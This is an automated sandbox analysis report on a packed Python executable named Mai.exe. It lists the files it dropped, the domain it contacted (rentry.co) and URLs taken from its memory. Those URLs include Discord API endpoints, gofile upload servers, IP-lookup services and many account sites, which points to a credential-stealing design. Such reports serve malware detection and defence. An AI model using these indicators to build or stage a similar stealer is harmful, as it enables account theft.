                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD5.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA1.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA224.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA256.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA384.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA512.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_keccak.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_poly1305.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Math\_modexp.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_x25519.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util\_strxor.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140_1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_asyncio.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_bz2.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_ctypes.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_decimal.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_hashlib.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_lzma.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_multiprocessing.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_overlapped.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_queue.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_socket.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_sqlite3.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\_ssl.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  rentry.co1%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%URL Reputationsafe
                  http://crl.dhimyotis.com/certignarootca.crl0%URL Reputationsafe
                  http://curl.haxx.se/rfc/cookie_spec.html0%URL Reputationsafe
                  http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode0%URL Reputationsafe
                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%URL Reputationsafe
                  https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
                  https://httpbin.org/0%URL Reputationsafe
                  http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%URL Reputationsafe
                  http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
                  http://tools.ietf.org/html/rfc6125#section-6.4.30%URL Reputationsafe
                  http://www.cert.fnmt.es/dpcs/0%URL Reputationsafe
                  http://www.cert.fnmt.es/dpcs/-0%Avira URL Cloudsafe
                  http://www.accv.es000%URL Reputationsafe
                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm0%URL Reputationsafe
                  https://coinbase.com)0%Avira URL Cloudsafe
                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0%Avira URL Cloudsafe
                  https://discord.com)z0%Avira URL Cloudsafe
                  http://www.firmaprofesional.com/cps00%URL Reputationsafe
                  https://discord.gift/0%Avira URL Cloudsafe
                  http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
                  http://www.quovadisglobal.com/cps00%URL Reputationsafe
                  http://www.iana.org/time-zones/repository/tz-link.html0%URL Reputationsafe
                  http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/0%URL Reputationsafe
                  http://ocsp.accv.es00%URL Reputationsafe
                  http://www.quovadisglobal.com/cps0%URL Reputationsafe
                  https://tiktok.com)0%Avira URL Cloudsafe
                  https://ebay.com)z$0%Avira URL Cloudsafe
                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0%VirustotalBrowse
                  http://www.cert.fnmt.es/dpcs/-0%VirustotalBrowse
                  http://docs.python.org/library/unittest.html0%Avira URL Cloudsafe
                  https://discord.com)0%Avira URL Cloudsafe
                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
                  https://rentry.co/pmpxa/rawz0%Avira URL Cloudsafe
                  https://packaging.python.org/en/latest/specifications/core-metadata/0%Avira URL Cloudsafe
                  https://discord.gift/1%VirustotalBrowse
                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%VirustotalBrowse
                  http://docs.python.org/library/unittest.html0%VirustotalBrowse
                  https://rentry.co/pmpxa/rawz2%VirustotalBrowse
                  https://paypal.com)0%Avira URL Cloudsafe
                  https://checkip.amazonaws.coml0%Avira URL Cloudsafe
                  https://github.com/pypa/packaging0%Avira URL Cloudsafe
                  https://refspecs.linuxfoundation.org/elf/gabi40%Avira URL Cloudsafe
                  https://github.com/pypa/packagingMEI765620%Avira URL Cloudsafe
                  https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr#r$Nrjr0%Avira URL Cloudsafe
                  https://xbox.com)0%Avira URL Cloudsafe
                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%Avira URL Cloudsafe
                  https://youtube.com)0%Avira URL Cloudsafe
                  https://twitch.com)z0%Avira URL Cloudsafe
                  https://tools.ietf.org/html/rfc36100%Avira URL Cloudsafe
                  https://github.com/platformdirs/platformdirs0%Avira URL Cloudsafe
                  https://checkip.amazonaws.comz0%Avira URL Cloudsafe
                  https://crunchyroll.com)0%Avira URL Cloudsafe
                  https://gmail.com)z0%Avira URL Cloudsafe
                  https://paypal.com)z0%Avira URL Cloudsafe
                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr#0%Avira URL Cloudsafe
                  https://peps.python.org/pep-0685/PJ0%Avira URL Cloudsafe
                  https://pypi.org/project/build/).0%Avira URL Cloudsafe
                  https://coinbase.com)z0%Avira URL Cloudsafe
                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
                  https://github.com/python/cpython/issues/86361.0%Avira URL Cloudsafe
                  https://ebay.com)0%Avira URL Cloudsafe
                  https://roblox.com)z0%Avira URL Cloudsafe
                  https://hbo.com)z0%Avira URL Cloudsafe
                  https://binance.com)z0%Avira URL Cloudsafe
                  https://discord.gg/r0%Avira URL Cloudsafe
                  https://playstation.com)0%Avira URL Cloudsafe
                  https://sellix.io)0%Avira URL Cloudsafe
                  https://github.com/pypa/setuptools/issues/417#issuecomment-3922984010%Avira URL Cloudsafe
                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt00%Avira URL Cloudsafe
                  https://discord.com/api/v6/guilds/0%Avira URL Cloudsafe
                  https://telegram.com)z0%Avira URL Cloudsafe
                  https://google.com/mail0%Avira URL Cloudsafe
                  https://github.com/jaraco/jaraco.functools/issues/50%Avira URL Cloudsafe
                  https://pornhub.com)z0%Avira URL Cloudsafe
                  http://www.rfc-editor.org/info/rfc72530%Avira URL Cloudsafe
                  https://rentry.co/5uu99/raw0%Avira URL Cloudsafe
                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.0%Avira URL Cloudsafe
                  https://mahler:8092/site-updates.py0%Avira URL Cloudsafe
                  https://api.gofile.io/getServerr0%Avira URL Cloudsafe
                  https://api.ipify.orgr0%Avira URL Cloudsafe
                  https://github.com/python/importlib_metadata/issues/396d__0%Avira URL Cloudsafe
                  https://discord.gg/0%Avira URL Cloudsafe
                  https://netflix.com)0%Avira URL Cloudsafe
                  https://github.com/urllib3/urllib3/issues/29200%Avira URL Cloudsafe
                  https://gmail.com)0%Avira URL Cloudsafe
                  https://outlook.com)0%Avira URL Cloudsafe
                  https://github.com)0%Avira URL Cloudsafe
                  http://cacerts.digicert.co0%Avira URL Cloudsafe
                  https://binance.com)0%Avira URL Cloudsafe
                  https://youtube.com)z0%Avira URL Cloudsafe
                  https://spotify.com)0%Avira URL Cloudsafe
                  https://spotify.com)z0%Avira URL Cloudsafe
                  http://docs.python.org/library/itertools.html#recipes0%Avira URL Cloudsafe
                  https://yahoo.com)z0%Avira URL Cloudsafe
                  https://discord.com/api/users/0%Avira URL Cloudsafe
                  https://api.gofile.io/getServer0%Avira URL Cloudsafe
                  https://steam.com)0%Avira URL Cloudsafe
                  https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  rentry.co
                  		104.26.3.16
                  		truetrueunknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.cert.fnmt.es/dpcs/-Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.gift/Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesMai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://coinbase.com)Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tiktok.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ebay.com)z$Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://docs.python.org/library/unittest.htmlMai.exe, 00000004.00000003.2205689716.000001995E31A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#Mai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://rentry.co/pmpxa/rawzMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://packaging.python.org/en/latest/specifications/core-metadata/Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64Mai.exe, 00000004.00000003.1548165458.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1541731901.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545270960.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2285064272.000001995E0DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2282469085.000001995E0B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://paypal.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/pypa/packagingMai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://refspecs.linuxfoundation.org/elf/gabi4Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://checkip.amazonaws.comlMai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/pypa/packagingMEI76562Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.com/api/v9/users/Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr#r$NrjrMai.exe, 00000004.00000003.1552004791.000001995E6B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552004791.000001995E665000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://xbox.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://youtube.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://twitch.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tools.ietf.org/html/rfc3610Mai.exe, 00000004.00000003.2295052810.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2374599976.000001995E373000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2237855104.000001995E372000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E31A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/platformdirs/platformdirsMai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.dhimyotis.com/certignarootca.crlMai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://curl.haxx.se/rfc/cookie_spec.htmlMai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodeMai.exe, 00000004.00000002.2719708650.000001995EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://checkip.amazonaws.comzMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyMai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://crunchyroll.com)Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://gmail.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://paypal.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr#Mai.exe, 00000004.00000003.1552004791.000001995E6B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552004791.000001995E665000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://peps.python.org/pep-0685/PJMai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://pypi.org/project/build/).Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://coinbase.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://wwww.certigna.fr/autorites/0mMai.exe, 00000004.00000002.2714680779.000001995E3AF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2377161951.000001995E3A8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerMai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/python/cpython/issues/86361.Mai.exe, 00000004.00000003.1533281148.000001995E02F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1537127365.000001995E045000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1534499254.000001995E02F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1535067924.000001995E024000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1536553084.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1533206807.000001995E0A7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2708791317.000001995DEE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ebay.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://httpbin.org/Mai.exe, 00000004.00000002.2720682259.000001995F0B0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://roblox.com)zMai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlMai.exe, 00000004.00000003.1540360354.000001995E36E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
